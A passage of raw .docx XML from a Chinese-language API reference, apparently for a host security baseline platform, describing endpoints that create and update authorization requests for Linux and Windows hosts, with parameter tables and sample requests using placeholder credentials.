        <w:t xml:space="preserve">    "flag" : true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "authToken" : "1da285b0062c4b0ca56f24dfce25b7f8"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752ACB8B"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224"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="2878"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="5000632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5CF7D39" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0403B293" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1CE67417" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6BC1A34F" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="39E8D657" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34739528" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>布尔</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="512DF94B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>状态</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1D3C32EC" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7EA31192" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>authToken</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50E60241" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22F146F7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>登陆产生的token,30min失效</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="297A3C43" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="188" w:name="新建授权请求"/>
      <w:bookmarkEnd w:id="187"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>新建授权请求</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5166967A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A7B2BD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/api/baseline/auth/{linux，win}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2780F67F"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225"/>
        <w:gridCol w:w="1220"/>
        <w:gridCol w:w="6904"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="551827D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97D26F4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="714C16AF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F0F32AF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3721CDF8" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1ABD026E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>comId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6012E696" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50250446" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>公司id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2D724E51" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26E76316" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>uuid</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15D0FB1E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D3E6340" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>用户id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="10DB238B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15333885" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>osType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="690BF78B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B24764D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>必填，1-linux；2-windows</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="46FBD870" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41EF4E7B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>realmType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14A2AD5D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3FE172BF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机范围：1-自定义，包括业务组、主机；0-全部主机，必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="262C01EA" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46AB0C5D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B063729" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="287EDE89" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组列表，如果realmType=1, 则agentIds和groups至少有一个不为空</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6B16647A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0152472D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentIds</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C8142AB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15E7723E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机列表，如果realmType=1, 则agentIds和groups至少有一个不为空</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4836163F" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55197FC0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>appName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E46C416" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0BDD69F2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>应用名, 必填,范围:MySQL,WebLogic</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="58E8BC14" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E00449A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>userName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B54C05B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D6438EE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>用户名, 必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2D0C43C4" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73843F40" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>password</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="337B8159" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="241DF9FE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>密码</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="187F8EB1" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A907C69" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2401A98E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6ED26527" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>端口</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1152C99B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7091EA26" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>params</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28D0A972" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>MAP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="680134C8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>存放token</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="300CF6D5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6613B4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "osType": 1,  //1：linux； 2：windows， 必填</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "realmType": 1,  //主机范围，1：自定义，包括业务组、主机； 0：全部主机， 必填</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "groups": [1],  //业务组列表，如果realmType=1, 则agentIds和groups至少有一个不为空</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "agentIds": ["xx1", "xx2"],  //主机列表，如果realmType=1, 则agentIds和groups至少有一个不为空</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "appName": "MySQL",  //应用名, 必填</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    "userName": "admin",  //用户名, 必填</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "password": "admin",  //密码</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "port": 3306,  //端口</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "params": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "authToken": "1da285b0062c4b0ca56f24dfce25b7f8",  //授权token，由前端传入，必填</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730EE7C9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDEEC8D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    true/false</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C25B1AC"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630"/>
        <w:gridCol w:w="630"/>
        <w:gridCol w:w="630"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="4489A03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D1DBBCC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="18BA5050" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3EA7C050" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1EAAA3EB" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6ED35D8D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3DB8DDB0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>布尔</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="781D7F54" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>状态</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="135F1F27" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="189" w:name="更新授权结果"/>
      <w:bookmarkEnd w:id="188"/>
      <w:r>
        <w:t>更新授权结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433AD829" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43837130" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>PUT /external/api/baseline/auth/{linux，win}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249A258A"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805"/>
        <w:gridCol w:w="1220"/>
        <w:gridCol w:w="6904"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="6B7B99F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89EF693" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15663E45" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E6FA0E1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="47A31D0E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7FCED52C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>comId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3CD4F298" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="506B8390" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>公司id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="564A9352" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="579E7195" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>uuid</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7478569D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="479FBE0B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>用户id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6DDC1AD3" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06029D24" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>osType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D531438" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="673B6D47" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>必填，1-linux；2-windows</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0319E768" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2FFE0F48" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>realmType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="409D1619" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
